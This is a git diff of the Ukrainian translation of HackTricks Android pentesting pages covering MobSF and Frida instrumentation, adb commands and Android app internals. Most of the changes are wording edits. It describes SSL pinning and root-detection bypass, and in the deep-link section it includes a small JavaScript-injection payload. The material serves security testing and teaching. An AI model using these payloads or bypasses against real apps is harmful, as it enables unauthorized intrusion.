- Захоплювати **HTTPS трафік**
- Використовувати **Frida** для отримання **інформації під час виконання**
@ -538,11 +538,11 @@ MobSF також дозволяє вам **diff/Compare** аналіз і інт
**Frida**
За замовчуванням, він також використовуватиме деякі скрипти Frida для **обходу SSL pinning**, **виявлення root** і **виявлення дебагера** та для **моніторингу цікавих API**.\
За замовчуванням, він також використовуватиме деякі скрипти Frida для **обходу SSL пінінгу**, **виявлення root** і **виявлення дебагера**, а також для **моніторингу цікавих API**.\
MobSF також може **викликати експортовані активності**, захоплювати **скріншоти** з них і **зберігати** їх для звіту.
Щоб **почати** динамічне тестування, натисніть зелену кнопку: "**Start Instrumentation**". Натисніть "**Frida Live Logs**", щоб побачити журнали, згенеровані скриптами Frida, і "**Live API Monitor**", щоб побачити всі виклики до підключених методів, передані аргументи та повернені значення (це з'явиться після натискання "Start Instrumentation").\
MobSF також дозволяє вам завантажити свої власні **Frida скрипти** (щоб надіслати результати ваших скриптів Frida до MobSF, використовуйте функцію `send()`). Він також має **кілька попередньо написаних скриптів**, які ви можете завантажити (ви можете додати більше в `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), просто **виберіть їх**, натисніть "**Load**" і натисніть "**Start Instrumentation**" (ви зможете побачити журнали цих скриптів у "**Frida Live Logs**").
MobSF також дозволяє вам завантажувати власні **скрипти Frida** (щоб надіслати результати ваших скриптів Frida до MobSF, використовуйте функцію `send()`). Він також має **кілька попередньо написаних скриптів**, які ви можете завантажити (ви можете додати більше в `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), просто **виберіть їх**, натисніть "**Load**" і натисніть "**Start Instrumentation**" (ви зможете бачити журнали цих скриптів у "**Frida Live Logs**").
![](<../../images/image (419).png>)
@ -550,12 +550,12 @@ MobSF також дозволяє вам завантажити свої вла
- **Перерахувати завантажені класи**: Він виведе всі завантажені класи
- **Захопити рядки**: Він виведе всі захоплені рядки під час використання програми (дуже шумно)
- **Захопити порівняння рядків**: Може бути дуже корисно. Він **показуватиме 2 рядки, які порівнюються** і чи був результат True чи False.
- **Захопити порівняння рядків**: Може бути дуже корисно. Він **показуватиме 2 рядки, які порівнюються** і чи був результат True або False.
- **Перерахувати методи класу**: Введіть ім'я класу (наприклад, "java.io.File") і він виведе всі методи класу.
- **Шукати шаблон класу**: Шукати класи за шаблоном
- **Трасувати методи класу**: **Трасувати** **весь клас** (дивитися вхідні та вихідні дані всіх методів класу). Пам'ятайте, що за замовчуванням MobSF трасує кілька цікавих методів Android API.
Якщо ви вибрали допоміжний модуль, який хочете використовувати, вам потрібно натиснути "**Start Intrumentation**" і ви побачите всі виходи в "**Frida Live Logs**".
Коли ви виберете допоміжний модуль, який хочете використовувати, вам потрібно натиснути "**Start Intrumentation**" і ви побачите всі виходи в "**Frida Live Logs**".
**Shell**
@ -573,7 +573,7 @@ receivers
Коли http трафік захоплений, ви можете побачити непривабливий вигляд захопленого трафіку на "**HTTP(S) Traffic**" внизу або більш привабливий вигляд на зеленій кнопці "**Start HTTPTools**". З другого варіанту ви можете **відправити** **захоплені запити** до **проксі** таких як Burp або Owasp ZAP.\
Для цього, _включіть Burp -->_ _вимкніть Intercept --> в MobSB HTTPTools виберіть запит_ --> натисніть "**Send to Fuzzer**" --> _виберіть адресу проксі_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Коли ви закінчите динамічний аналіз з MobSF, ви можете натиснути на "**Start Web API Fuzzer**", щоб **фузити http запити** і шукати вразливості.
Коли ви закінчите динамічний аналіз з MobSF, ви можете натиснути на "**Start Web API Fuzzer**", щоб **фузити http запити** та шукати вразливості.
> [!NOTE]
> Після виконання динамічного аналізу з MobSF налаштування проксі можуть бути неправильно сконфігуровані, і ви не зможете їх виправити з GUI. Ви можете виправити налаштування проксі, виконавши:
@ -595,7 +595,7 @@ receivers
### [Qark](https://github.com/linkedin/qark)
Цей інструмент призначений для пошуку кількох **вразливостей Android додатків, пов'язаних з безпекою**, як у **джерельному коді**, так і в **упакованих APK**. Інструмент також **може створювати "Proof-of-Concept" розгортаємий APK** та **команди ADB**, щоб експлуатувати деякі з виявлених вразливостей (викриті активності, наміри, tapjacking...). Як і з Drozer, немає необхідності рутувати тестовий пристрій.
Цей інструмент призначений для пошуку кількох **вразливостей Android додатків, пов'язаних з безпекою**, як у **джерельному коді**, так і в **упакованих APK**. Інструмент також **може створювати "Proof-of-Concept" розгортаємий APK** та **команди ADB**, щоб експлуатувати деякі з виявлених вразливостей (викриті активності, наміри, tapjacking...). Як і з Drozer, немає потреби рутувати тестовий пристрій.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
@ -657,7 +657,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** - це **M**обільний **A**плікаційний **R**еверс-інжиніринг та **A**наліз Фреймворк. Це інструмент, який об'єднує загальновживані інструменти реверс-інжинірингу та аналізу мобільних додатків, щоб допомогти в тестуванні мобільних додатків на предмет загроз безпеці мобільних додатків OWASP. Його мета - спростити це завдання та зробити його більш зручним для розробників мобільних додатків та фахівців з безпеки.
**MARA** - це **M**обільний **A**плікаційний **R**еверс-інжиніринг та **A**наліз Фреймворк. Це інструмент, який об'єднує загальновживані інструменти реверс-інжинірингу та аналізу мобільних додатків, щоб допомогти в тестуванні мобільних додатків на предмет загроз безпеці мобільних додатків OWASP. Його мета - спростити це завдання та зробити його більш дружнім для розробників мобільних додатків і фахівців з безпеки.
Він здатний:
@ -678,7 +678,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
З [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** - це інструмент командного рядка з відкритим кодом, який зменшує, оптимізує та обфускує Java код. Він здатний оптимізувати байт-код, а також виявляти та видаляти невикористовувані інструкції. ProGuard - це безкоштовне програмне забезпечення, яке розповсюджується під ліцензією GNU General Public License, версія 2.
З [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** - це інструмент командного рядка з відкритим кодом, який зменшує, оптимізує та обфускує Java код. Він здатний оптимізувати байт-код, а також виявляти та видаляти невикористовувані інструкції. ProGuard є безкоштовним програмним забезпеченням і розповсюджується під ліцензією GNU General Public License, версія 2.
ProGuard розповсюджується як частина Android SDK і запускається під час створення програми в режимі випуску.

6
src/mobile-pentesting/android-app-pentesting/adb-commands.md
View File

@ -1,5 +1,3 @@
{{#include ../../banners/hacktricks-training.md}}
**Adb зазвичай знаходиться в:**
```bash
#Windows
@ -194,7 +192,7 @@ adb shell pidof com.your.application
```bash
adb root
```
Перезапускає демон adbd з правами root. Потім вам потрібно знову підключитися до сервера ADB, і ви будете root (якщо доступно)
Перезапускає демон adbd з правами root. Потім вам потрібно знову підключитися до сервера ADB, і ви будете root (якщо доступно).
```bash
adb sideload <update.zip>
```
@ -204,7 +202,7 @@ adb sideload <update.zip>
## Logcat
Щоб **відфільтрувати повідомлення лише однієї програми**, отримайте PID програми та використовуйте grep (linux/macos) або findstr (windows) для фільтрації виходу logcat:
Щоб **відфільтрувати повідомлення лише одного додатку**, отримайте PID додатку та використовуйте grep (linux/macos) або findstr (windows) для фільтрації виходу logcat:
```bash
adb logcat | grep 4526
adb logcat | findstr 4526

86
src/mobile-pentesting/android-app-pentesting/android-applications-basics.md
View File

@ -21,7 +21,7 @@
### Пісочниця
**Пісочниця Android-додатків** дозволяє запускати **кожен додаток** як **окремий процес під окремим ідентифікатором користувача**. Кожен процес має свою віртуальну машину, тому код додатка виконується в ізоляції від інших додатків.\
З Android 5.0(L) **SELinux** є обов'язковим. В основному, SELinux забороняє всі взаємодії процесів, а потім створює політики, щоб **дозволити лише очікувані взаємодії між ними**.
З Android 5.0(L) **SELinux** впроваджено. В основному, SELinux забороняє всі взаємодії процесів, а потім створює політики, щоб **дозволити лише очікувані взаємодії між ними**.
### Дозволи
@ -37,7 +37,7 @@
- **Нормальний**: Використовується, коли **немає відомих загроз** для додатка. Користувач **не зобов'язаний його затверджувати**.
- **Небезпечний**: Вказує, що дозвіл надає запитуючому додатку певний **підвищений доступ**. **Користувачі просять їх затвердити**.
- **Підпис**: Тільки **додатки, підписані тим же сертифікатом, що й той**, що експортує компонент, можуть отримати дозвіл. Це найсильніший тип захисту.
- **Підпис або система**: Тільки **додатки, підписані тим же сертифікатом, що й той**, що експортує компонент, або **додатки, що працюють з доступом на рівні системи**, можуть отримати дозволи.
- **SignatureOrSystem**: Тільки **додатки, підписані тим же сертифікатом, що й той**, що експортує компонент, або **додатки, що працюють з доступом на рівні системи**, можуть отримати дозволи.
## Попередньо встановлені додатки
@ -45,12 +45,12 @@
- Ті, що постачаються з **AOSP** (Android OpenSource Project) **ROM**
- Додані виробником **пристрою**
- Додані постачальником **мобільного телефону** (якщо куплені у них)
- Додані постачальником **мобільного зв'язку** (якщо куплені у них)
## Рутування
Щоб отримати доступ root на фізичному пристрої Android, вам зазвичай потрібно **експлуатувати** 1 або 2 **вразливості**, які зазвичай є **специфічними** для **пристрою** та **версії**.\
Після того, як експлуатація спрацювала, зазвичай бінарний файл Linux `su` копіюється в місце, вказане в змінній середовища PATH користувача, наприклад, `/system/xbin`.
Щоб отримати доступ root на фізичному пристрої Android, вам зазвичай потрібно **використати** 1 або 2 **вразливості**, які зазвичай є **специфічними** для **пристрою** та **версії**.\
Після того, як експлойт спрацював, зазвичай бінарний файл Linux `su` копіюється в місце, вказане в змінній середовища PATH користувача, наприклад, `/system/xbin`.
Після налаштування бінарного файлу su використовується інший Android-додаток для взаємодії з бінарним файлом `su` та **обробки запитів на доступ root**, таких як **Superuser** та **SuperSU** (доступні в Google Play Store).
@ -66,11 +66,11 @@
### Наслідки
Після рутування пристрою будь-який додаток може запитати доступ як root. Якщо зловмисний додаток отримає його, він матиме доступ до майже всього і зможе пошкодити телефон.
Після рутування пристрою будь-який додаток може запитати доступ як root. Якщо зловмисний додаток отримає його, він матиме доступ практично до всього і зможе пошкодити телефон.
## Основи Android-додатків <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
- Формат Android-додатків називається _APK file format_. Це, по суті, **ZIP-файл** (перейменувавши розширення файлу на .zip, вміст можна витягти та переглянути).
- Формат Android-додатків називається _APK file format_. Це в основному **ZIP файл** (перейменувавши розширення файлу на .zip, вміст можна витягти та переглянути).
- Вміст APK (не вичерпний)
- **AndroidManifest.xml**
- resources.arsc/strings.xml
@ -83,44 +83,44 @@
- lib/
- Містить рідні бібліотеки, розділені за архітектурою ЦП в підкаталогах.
- `armeabi`: код для процесорів на базі ARM
- `armeabi-v7a`: код для процесорів ARMv7 і вище
- `armeabi-v7a`: код для процесорів ARMv7 та вище
- `x86`: код для процесорів X86
- `mips`: код лише для процесорів MIPS
- assets/
- Зберігає різні файли, необхідні додатку, потенційно включаючи додаткові рідні бібліотеки або DEX-файли, іноді використовувані авторами шкідливих програм для приховування додаткового коду.
- Зберігає різні файли, необхідні додатку, потенційно включаючи додаткові рідні бібліотеки або DEX файли, іноді використовувані авторами шкідливих програм для приховування додаткового коду.
- res/
- Містить ресурси, які не скомпільовані в resources.arsc
### **Dalvik & Smali**
У розробці Android використовується **Java або Kotlin** для створення додатків. Замість використання JVM, як у настільних додатках, Android компілює цей код у **Dalvik Executable (DEX) байт-код**. Раніше цим байт-кодом займалася віртуальна машина Dalvik, але тепер Android Runtime (ART) бере на себе цю функцію в новіших версіях Android.
У розробці Android використовується **Java або Kotlin** для створення додатків. Замість використання JVM, як у настільних додатках, Android компілює цей код у **Dalvik Executable (DEX) байт-код**. Раніше віртуальна машина Dalvik обробляла цей байт-код, але тепер Android Runtime (ART) бере на себе цю функцію в новіших версіях Android.
Для реверс-інжинірингу **Smali** стає критично важливим. Це читабельна людиною версія DEX-байт-коду, яка діє як асемблерна мова, перетворюючи вихідний код на інструкції байт-коду. Smali та baksmali відносяться до інструментів асемблювання та розбирання в цьому контексті.
Для реверс-інжинірингу **Smali** стає критично важливим. Це читабельна людиною версія DEX байт-коду, яка діє як асемблерна мова, перетворюючи вихідний код на інструкції байт-коду. Smali та baksmali відносяться до інструментів асемблювання та розбирання в цьому контексті.
## Інтенти
Інтенти є основним засобом, за допомогою якого Android-додатки спілкуються між своїми компонентами або з іншими додатками. Ці об'єкти повідомлень також можуть переносити дані між додатками або компонентами, подібно до того, як використовуються запити GET/POST у HTTP-комунікаціях.
Отже, Інтент - це, по суті, **повідомлення, яке передається між компонентами**. Інтенти **можуть бути спрямовані** на конкретні компоненти або додатки, **або можуть бути надіслані без конкретного отримувача**.\
Простими словами, Інтент може бути використаний:
Отже, Інтент - це в основному **повідомлення, яке передається між компонентами**. Інтенти **можуть бути спрямовані** на конкретні компоненти або додатки, **або можуть бути надіслані без конкретного отримувача**.\
Простими словами, Інтент можна використовувати:
- Для запуску активності, зазвичай відкриваючи інтерфейс користувача для додатку
- Щоб запустити Activity, зазвичай відкриваючи інтерфейс користувача для додатку
- Як трансляції, щоб повідомити систему та додатки про зміни
- Для запуску, зупинки та взаємодії з фоновою службою
- Для доступу до даних через ContentProviders
- Щоб запускати, зупиняти та взаємодіяти з фоновим сервісом
- Щоб отримати доступ до даних через ContentProviders
- Як зворотні виклики для обробки подій
Якщо вразливий, **інтенти можуть бути використані для виконання різноманітних атак**.
Якщо вразливі, **інтенти можуть бути використані для виконання різноманітних атак**.
### Фільтр Інтентів
**Фільтри Інтентів** визначають, **як активність, служба або приймач трансляцій можуть взаємодіяти з різними типами Інтентів**. По суті, вони описують можливості цих компонентів, такі як дії, які вони можуть виконувати, або типи трансляцій, які вони можуть обробляти. Основне місце для оголошення цих фільтрів - це **файл AndroidManifest.xml**, хоча для приймачів трансляцій також є можливість їх кодування.
**Фільтри Інтентів** визначають **як активність, сервіс або приймач трансляцій можуть взаємодіяти з різними типами Інтентів**. В основному, вони описують можливості цих компонентів, такі як дії, які вони можуть виконувати, або типи трансляцій, які вони можуть обробляти. Основне місце для оголошення цих фільтрів - це **файл AndroidManifest.xml**, хоча для приймачів трансляцій також є можливість їх кодування.
Фільтри Інтентів складаються з категорій, дій та фільтрів даних, з можливістю включення додаткових метаданих. Ця настройка дозволяє компонентам обробляти конкретні Інтенти, які відповідають оголошеним критеріям.
Критичним аспектом Android-компонентів (активності/служби/постачальники контенту/приймачі трансляцій) є їх видимість або **публічний статус**. Компонент вважається публічним і може взаємодіяти з іншими додатками, якщо він **`exported`** зі значенням **`true`** або якщо для нього в маніфесті оголошено фільтр Інтентів. Однак розробники можуть явно зберігати ці компоненти приватними, забезпечуючи їх ненавмисну взаємодію з іншими додатками. Це досягається шляхом встановлення атрибута **`exported`** на **`false`** у їхніх визначеннях маніфесту.
Критичним аспектом Android-компонентів (активності/сервіси/постачальники контенту/приймачі трансляцій) є їх видимість або **публічний статус**. Компонент вважається публічним і може взаємодіяти з іншими додатками, якщо він **`exported`** зі значенням **`true`** або якщо для нього в маніфесті оголошено фільтр Інтентів. Однак є спосіб для розробників явно зберегти ці компоненти приватними, забезпечуючи їх ненавмисну взаємодію з іншими додатками. Це досягається шляхом встановлення атрибута **`exported`** на **`false`** у їхніх визначеннях маніфесту.
Більше того, розробники мають можливість додатково захистити доступ до цих компонентів, вимагаючи певних дозволів. Атрибут **`permission`** може бути встановлений, щоб забезпечити доступ лише для додатків з призначеним дозволом, додаючи додатковий рівень безпеки та контролю над тим, хто може взаємодіяти з ним.
Більше того, розробники мають можливість додатково захистити доступ до цих компонентів, вимагаючи специфічних дозволів. Атрибут **`permission`** може бути встановлений, щоб забезпечити, що лише додатки з призначеним дозволом можуть отримати доступ до компонента, додаючи додатковий рівень безпеки та контролю над тим, хто може з ним взаємодіяти.
```java
<activity android:name=".MyActivity" android:exported="false">
<!-- Intent filters go here -->
@ -165,11 +165,11 @@ context.startService(intent);
### Broadcast Intents
На відміну від попередніх намірів, які отримує лише один додаток, широкомовні наміри **можуть бути отримані кількома додатками**. Однак, починаючи з версії API 14, **можна вказати додаток, який повинен отримати** повідомлення, використовуючи Intent.setPackage.
На відміну від попередніх намірів, які отримує лише один додаток, широкомовні наміри **можуть бути отримані кількома додатками**. Однак, починаючи з версії API 14, **можливо вказати додаток, який повинен отримати** повідомлення, використовуючи Intent.setPackage.
Альтернативно, також можливо **вказати дозвіл при відправці широкомовлення**. Додаток-отримувач повинен мати цей дозвіл.
Існує **два типи** широкомовлень: **Звичайні** (асинхронні) та **Упорядковані** (синхронні). **Порядок** базується на **налаштованому пріоритеті в елементі отримувача**. **Кожен додаток може обробляти, передавати або відкидати широкомовлення.**
Існує **два типи** широкомовлень: **Звичайні** (асинхронні) та **Упорядковані** (синхронні). **Порядок** базується на **налаштованому пріоритеті в елементі отримувача**. **Кожен додаток може обробляти, передавати або відхиляти широкомовлення.**
Можна **відправити** **широкомовлення**, використовуючи функцію `sendBroadcast(intent, receiverPermission)` з класу `Context`.\
Ви також можете використовувати функцію **`sendBroadcast`** з **`LocalBroadCastManager`**, яка забезпечує, що **повідомлення ніколи не покидає додаток**. Використовуючи це, вам навіть не потрібно експортувати компонент отримувача.
@ -177,7 +177,7 @@ context.startService(intent);
### Sticky Broadcasts
Цей вид широкомовлень **може бути доступний довго після їх відправлення**.\
Вони були застарілі на рівні API 21, і рекомендується **не використовувати їх**.\
Вони були застарілі в рівні API 21, і рекомендується **не використовувати їх**.\
**Вони дозволяють будь-якому додатку перехоплювати дані, але також їх модифікувати.**
Якщо ви знайдете функції, що містять слово "sticky", такі як **`sendStickyBroadcast`** або **`sendStickyBroadcastAsUser`**, **перевірте вплив і спробуйте їх видалити**.
@ -200,13 +200,13 @@ context.startService(intent);
```
Схема з попереднього прикладу - `examplescheme://` (також зверніть увагу на **`категорію BROWSABLE`**)
Тоді в полі даних ви можете вказати **хост** та **шлях**:
Тоді в полі даних ви можете вказати **host** та **path**:
```xml
<data android:scheme="examplescheme"
android:host="example"
/>
```
Щоб отримати доступ до нього з вебу, можна встановити посилання, як:
Щоб отримати доступ до нього з вебу, можна встановити посилання, як-от:
```xml
<a href="examplescheme://example/something">click here</a>
<a href="examplescheme://example/javascript://%250dalert(1)">click here</a>
@ -217,25 +217,25 @@ android:host="example"
## AIDL - Мова визначення інтерфейсу Android
**Мова визначення інтерфейсу Android (AIDL)** призначена для полегшення комунікації між клієнтом і сервісом в Android-додатках через **міжпроцесну комунікацію** (IPC). Оскільки безпосередній доступ до пам'яті іншого процесу не дозволений в Android, AIDL спрощує процес, перетворюючи об'єкти в формат, зрозумілий операційній системі, що полегшує комунікацію між різними процесами.
**Мова визначення інтерфейсу Android (AIDL)** призначена для полегшення зв'язку між клієнтом і службою в Android-додатках через **міжпроцесорну комунікацію** (IPC). Оскільки безпосередній доступ до пам'яті іншого процесу не дозволений в Android, AIDL спрощує процес, перетворюючи об'єкти в формат, зрозумілий операційній системі, що полегшує комунікацію між різними процесами.
### Ключові концепції
- **Прив'язані сервіси**: Ці сервіси використовують AIDL для IPC, що дозволяє активностям або компонентам підключатися до сервісу, робити запити та отримувати відповіді. Метод `onBind` у класі сервісу є критично важливим для ініціювання взаємодії, що робить його важливою областю для перевірки безпеки в пошуках вразливостей.
- **Прив'язані служби**: Ці служби використовують AIDL для IPC, що дозволяє активностям або компонентам підключатися до служби, робити запити та отримувати відповіді. Метод `onBind` у класі служби є критично важливим для ініціювання взаємодії, що робить його важливою областю для перевірки безпеки в пошуках вразливостей.
- **Messenger**: Працюючи як прив'язаний сервіс, Messenger полегшує IPC з акцентом на обробку даних через метод `onBind`. Важливо уважно перевірити цей метод на предмет небезпечного оброблення даних або виконання чутливих функцій.
- **Messenger**: Працюючи як прив'язана служба, Messenger полегшує IPC з акцентом на обробку даних через метод `onBind`. Важливо уважно перевірити цей метод на предмет небезпечного оброблення даних або виконання чутливих функцій.
- **Binder**: Хоча безпосереднє використання класу Binder є менш поширеним через абстракцію AIDL, корисно розуміти, що Binder діє як драйвер на рівні ядра, що полегшує передачу даних між просторами пам'яті різних процесів. Для подальшого розуміння доступний ресурс за посиланням [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
- **Binder**: Хоча безпосереднє використання класу Binder є менш поширеним через абстракцію AIDL, корисно розуміти, що Binder діє як драйвер на рівні ядра, що полегшує передачу даних між пам'яттю різних процесів. Для подальшого розуміння доступний ресурс за посиланням [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
## Компоненти
До них відносяться: **Активності, Сервіси, Отримувачі трансляцій та Провайдери.**
До них відносяться: **Активності, Служби, Отримувачі трансляцій та Провайдери.**
### Активність запуску та інші активності
В Android-додатках **активності** подібні до екранів, що показують різні частини інтерфейсу користувача додатку. Додаток може мати багато активностей, кожна з яких представляє унікальний екран для користувача.
У Android-додатках **активності** подібні до екранів, що показують різні частини інтерфейсу користувача додатку. Додаток може мати багато активностей, кожна з яких представляє унікальний екран для користувача.
**Активність запуску** є основним шлюзом до додатку, який запускається, коли ви натискаєте на іконку додатку. Вона визначена у файлі маніфесту додатку зі специфічними MAIN та LAUNCHER намірами:
**Активність запуску** є основним шлюзом до додатку, яка запускається, коли ви натискаєте на іконку додатку. Вона визначена у файлі маніфесту додатку з конкретними намірами MAIN та LAUNCHER:
```markup
<activity android:name=".LauncherActivity">
<intent-filter>
@ -252,11 +252,11 @@ android:host="example"
```
Однак доступ до активності з іншого додатку не завжди є ризиком для безпеки. Проблема виникає, якщо чутливі дані передаються неналежним чином, що може призвести до витоків інформації.
Життєвий цикл активності **починається з методу onCreate**, налаштовуючи інтерфейс користувача та готуючи активність до взаємодії з користувачем.
Життєвий цикл активності **починається з методу onCreate**, налаштовуючи UI та готуючи активність до взаємодії з користувачем.
### Підклас додатку
У розробці Android додаток має можливість створити **підклас** класу [Application](https://developer.android.com/reference/android/app/Application), хоча це не є обов'язковим. Коли такий підклас визначено, він стає першим класом, який створюється в додатку. Метод **`attachBaseContext`**, якщо він реалізований у цьому підкласі, виконується перед методом **`onCreate`**. Це налаштування дозволяє здійснити ранню ініціалізацію перед тим, як почне працювати решта додатку.
У розробці Android додаток має можливість створити **підклас** класу [Application](https://developer.android.com/reference/android/app/Application), хоча це не є обов'язковим. Коли такий підклас визначено, він стає першим класом, який буде створено в додатку. Метод **`attachBaseContext`**, якщо він реалізований у цьому підкласі, виконується перед методом **`onCreate`**. Це налаштування дозволяє здійснити ранню ініціалізацію перед тим, як почне працювати решта додатку.
```java
public class MyApp extends Application {
@Override
@ -274,11 +274,11 @@ super.onCreate();
```
### Сервіси
[Services](https://developer.android.com/guide/components/services) - це **фонові операції**, здатні виконувати завдання без інтерфейсу користувача. Ці завдання можуть продовжувати виконуватись навіть коли користувачі переходять до інших додатків, що робить сервіси критично важливими для **тривалих операцій**.
[Services](https://developer.android.com/guide/components/services) - це **фонові операції**, здатні виконувати завдання без інтерфейсу користувача. Ці завдання можуть продовжувати виконуватись навіть коли користувачі переходять до інших додатків, що робить сервіси важливими для **тривалих операцій**.
Сервіси універсальні; їх можна ініціювати різними способами, при цьому **Intents** є основним методом для їх запуску як точки входу в додаток. Як тільки сервіс запущено за допомогою методу `startService`, його метод `onStart` активується і продовжує працювати, поки не буде явно викликано метод `stopService`. Альтернативно, якщо роль сервісу залежить від активного з'єднання клієнта, використовується метод `bindService` для прив'язки клієнта до сервісу, активуючи метод `onBind` для передачі даних.
Сервіси універсальні; їх можна ініціювати різними способами, при цьому **Intents** є основним методом для їх запуску як точки входу додатку. Як тільки сервіс запущено за допомогою методу `startService`, його метод `onStart` активується і продовжує працювати, поки метод `stopService` не буде явно викликаний. Альтернативно, якщо роль сервісу залежить від активного з'єднання клієнта, використовується метод `bindService` для прив'язки клієнта до сервісу, активуючи метод `onBind` для передачі даних.
Цікаве застосування сервісів включає відтворення фонової музики або отримання мережевих даних без перешкоджання взаємодії користувача з додатком. Більше того, сервіси можуть бути доступні для інших процесів на тому ж пристрої через **експорт**. Це не є поведінкою за замовчуванням і вимагає явної конфігурації в файлі Android Manifest:
Цікаве застосування сервісів включає відтворення фонової музики або отримання мережевих даних без перешкоджання взаємодії користувача з додатком. Більше того, сервіси можуть бути доступні для інших процесів на тому ж пристрої через **експорт**. Це не є поведінкою за замовчуванням і вимагає явної конфігурації у файлі Android Manifest:
```xml
<service android:name=".ExampleExportedService" android:exported="true"/>
```
@ -290,15 +290,15 @@ super.onCreate();
Трансляції можуть бути **асинхронними**, досягаючи всіх приймачів без порядку, або **синхронними**, де приймачі отримують трансляцію на основі встановлених пріоритетів. Однак важливо зазначити потенційний ризик безпеки, оскільки будь-який додаток може пріоритизувати себе, щоб перехопити трансляцію.
Щоб зрозуміти функціональність приймача, шукайте метод **`onReceive`** у його класі. Код цього методу може маніпулювати отриманим Intent, підкреслюючи необхідність валідації даних приймачами, особливо в **Ordered Broadcasts**, які можуть модифікувати або скинути Intent.
Щоб зрозуміти функціональність приймача, шукайте метод **`onReceive`** у його класі. Код цього методу може маніпулювати отриманим Intent, підкреслюючи необхідність валідації даних приймачами, особливо в **Ordered Broadcasts**, які можуть змінювати або скасовувати Intent.
### Content Provider
**Content Providers** є важливими для **обміну структурованими даними** між додатками, підкреслюючи важливість реалізації **дозволів** для забезпечення безпеки даних. Вони дозволяють додаткам отримувати доступ до даних з різних джерел, включаючи бази даних, файлові системи або веб. Специфічні дозволи, такі як **`readPermission`** і **`writePermission`**, є критично важливими для контролю доступу. Крім того, тимчасовий доступ може бути наданий через налаштування **`grantUriPermission`** у маніфесті додатка, використовуючи атрибути, такі як `path`, `pathPrefix` і `pathPattern` для детального контролю доступу.
**Content Providers** є важливими для **обміну структурованими даними** між додатками, підкреслюючи важливість реалізації **дозволів** для забезпечення безпеки даних. Вони дозволяють додаткам отримувати доступ до даних з різних джерел, включаючи бази даних, файлові системи або веб. Специфічні дозволи, такі як **`readPermission`** і **`writePermission`**, є важливими для контролю доступу. Крім того, тимчасовий доступ може бути наданий через налаштування **`grantUriPermission`** у маніфесті додатка, використовуючи атрибути, такі як `path`, `pathPrefix` і `pathPattern` для детального контролю доступу.
Валідація введення є надзвичайно важливою для запобігання вразливостям, таким як SQL-ін'єкції. Content Providers підтримують основні операції: `insert()`, `update()`, `delete()` і `query()`, полегшуючи маніпуляцію та обмін даними між додатками.
**FileProvider**, спеціалізований Content Provider, зосереджується на безпечному обміні файлами. Він визначається в маніфесті додатка з конкретними атрибутами для контролю доступу до папок, позначеними `android:exported` та `android:resource`, що вказують на конфігурації папок. Обережність рекомендується при обміні каталогами, щоб уникнути випадкового розкриття чутливих даних.
**FileProvider**, спеціалізований Content Provider, зосереджується на безпечному обміні файлами. Він визначається в маніфесті додатка з конкретними атрибутами для контролю доступу до папок, позначеними `android:exported` і `android:resource`, що вказують на конфігурації папок. Обережність рекомендується при обміні каталогами, щоб уникнути випадкового розкриття чутливих даних.
Приклад декларації маніфесту для FileProvider:
```xml
@ -332,7 +332,7 @@ Android пропонує два основних типи WebView:
Ключовий момент полягає в тому, що браузери WebView **не ділять куки** з основним браузером пристрою.
Для завантаження контенту доступні методи, такі як `loadUrl`, `loadData` та `loadDataWithBaseURL`. Важливо переконатися, що ці URL або файли є **безпечними для використання**. Налаштування безпеки можна керувати через клас `WebSettings`. Наприклад, вимкнення JavaScript за допомогою `setJavaScriptEnabled(false)` може запобігти XSS атакам.
Для завантаження контенту доступні методи, такі як `loadUrl`, `loadData` та `loadDataWithBaseURL`. Важливо переконатися, що ці URL або файли **безпечні для використання**. Налаштування безпеки можна керувати через клас `WebSettings`. Наприклад, вимкнення JavaScript за допомогою `setJavaScriptEnabled(false)` може запобігти XSS атакам.
JavaScript "Bridge" дозволяє Java об'єктам взаємодіяти з JavaScript, вимагаючи, щоб методи були позначені `@JavascriptInterface` для безпеки з Android 4.2 і вище.
@ -346,7 +346,7 @@ JavaScript "Bridge" дозволяє Java об'єктам взаємодіяти
### **Цифровий підпис додатків**
- **Цифровий підпис** є обов'язковим для Android додатків, забезпечуючи їх **автентичне авторство** перед установкою. Цей процес використовує сертифікат для ідентифікації додатка і повинен бути перевірений менеджером пакетів пристрою під час установки. Додатки можуть бути **самопідписаними або сертифікованими зовнішнім CA**, що захищає від несанкціонованого доступу та забезпечує, щоб додаток залишався незмінним під час доставки на пристрій.
- **Цифровий підпис** є обов'язковим для Android додатків, забезпечуючи їх **автентичну авторизацію** перед установкою. Цей процес використовує сертифікат для ідентифікації додатка і повинен бути перевірений менеджером пакетів пристрою під час установки. Додатки можуть бути **самопідписаними або сертифікованими зовнішнім CA**, захищаючи від несанкціонованого доступу та забезпечуючи, щоб додаток залишався незмінним під час доставки на пристрій.
### **Перевірка додатків для підвищення безпеки**
@ -354,7 +354,7 @@ JavaScript "Bridge" дозволяє Java об'єктам взаємодіяти
### **Управління мобільними пристроями (MDM)**
- **MDM рішення** забезпечують **нагляд та безпеку** для мобільних пристроїв через **Device Administration API**. Вони вимагають установки Android додатка для ефективного управління та захисту мобільних пристроїв. Основні функції включають **впровадження політик паролів**, **обов'язкове шифрування зберігання** та **дозволення віддаленого видалення даних**, забезпечуючи всебічний контроль та безпеку мобільних пристроїв.
- **MDM рішення** забезпечують **нагляд та безпеку** для мобільних пристроїв через **Device Administration API**. Вони вимагають установки Android додатка для ефективного управління та захисту мобільних пристроїв. Основні функції включають **забезпечення політик паролів**, **обов'язкове шифрування зберігання** та **дозволення віддаленого видалення даних**, забезпечуючи всебічний контроль та безпеку мобільних пристроїв.
```java
// Example of enforcing a password policy with MDM
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(Context.DEVICE_POLICY_SERVICE);

26
src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
View File
